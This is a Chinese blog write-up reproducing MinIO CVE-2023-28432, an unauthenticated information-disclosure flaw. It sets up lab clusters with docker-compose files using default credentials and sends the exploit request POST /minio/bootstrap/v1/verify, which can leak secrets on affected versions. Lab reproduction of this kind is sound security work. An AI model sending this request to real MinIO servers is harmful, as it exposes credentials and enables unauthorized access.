MinIO未授权信息泄露(CVE-2023-28432)

作者: print("") 分类: 信息安全 发布时间: 2023-03-23 20:34

漏洞范围:

MinIO RELEASE.2019-12-17T23-16-33Z <= version < MinIO RELEASE.2023-03-20T20-16-18Z

一、低版本

docker-compose.yml

version: '3.7'
services:
  minio1:
    image: minio/minio:RELEASE.2021-01-16T02-19-44Z
    volumes:
      - data1-1:/data1
      - data1-2:/data2
    ports:
      - "9000:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

## By default this config uses default local driver,
## For custom volumes replace with volume driver configuration.
volumes:
  data1-1:
  data1-2:


启动

[root@localhost momo]# 
[root@localhost momo]# docker-compose -f docker-compose2.yml up
Building with native build. Learn about native build in Compose here: https://docs.docker.com/go/compose-native-build/
Pulling minio1 (minio/minio:RELEASE.2021-01-16T02-19-44Z)...
RELEASE.2021-01-16T02-19-44Z: Pulling from minio/minio
a6b97b4963f5: Pull complete
13948a011eec: Pull complete
b27f7b93c977: Pull complete
527a35f50a95: Pull complete
bae74d83b250: Pull complete
0f5c2801c42c: Pull complete
23c30f3146bf: Pull complete
Digest: sha256:a176d2194523a587f4103bce5e8d408e7aadc737e7e67067ca9c195a2b69fbe4
Status: Downloaded newer image for minio/minio:RELEASE.2021-01-16T02-19-44Z
Recreating momo_minio1_1 ... done


启动之后需要等等。大概一分钟左右。才能访问

访问一下

测试一下

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.69.81:9000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

低版本发现会啥信息都没有。

二、高版本

version: '3.7'

# starts 4 docker containers running minio server instances. Each
# minio server's web interface will be accessible on the host at port
# 9001 through 9004.
services:
  minio1:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio1
    volumes:
      - data1-1:/data1
      - data1-2:/data2
    ports:
      - "9001:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

  minio2:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio2
    volumes:
      - data2-1:/data1
      - data2-2:/data2
    ports:
      - "9002:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

  minio3:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio3
    volumes:
      - data3-1:/data1
      - data3-2:/data2
    ports:
      - "9003:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

  minio4:
    image: minio/minio:RELEASE.2023-01-31T02-24-19Z
    container_name: minio4
    volumes:
      - data4-1:/data1
      - data4-2:/data2
    ports:
      - "9004:9000"
    environment:
      MINIO_ACCESS_KEY: minio
      MINIO_SECRET_KEY: minio123
    command: server http://minio{1...4}/data{1...2}
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/minio/health/live"]
      interval: 30s
      timeout: 20s
      retries: 3

## By default this config uses default local driver,
## For custom volumes replace with volume driver configuration.
volumes:
  data1-1:
  data1-2:
  data2-1:
  data2-2:
  data3-1:
  data3-2:
  data4-1:
  data4-2:

启动一下:

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.69.81:9000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close



如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

您的电子邮箱地址不会被公开。